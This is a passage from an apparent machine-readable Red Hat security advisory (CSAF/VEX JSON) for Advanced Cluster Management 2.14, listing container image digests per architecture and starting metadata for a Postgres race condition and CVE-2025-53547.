"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-53547",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2025-07-08T22:01:16.594090+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
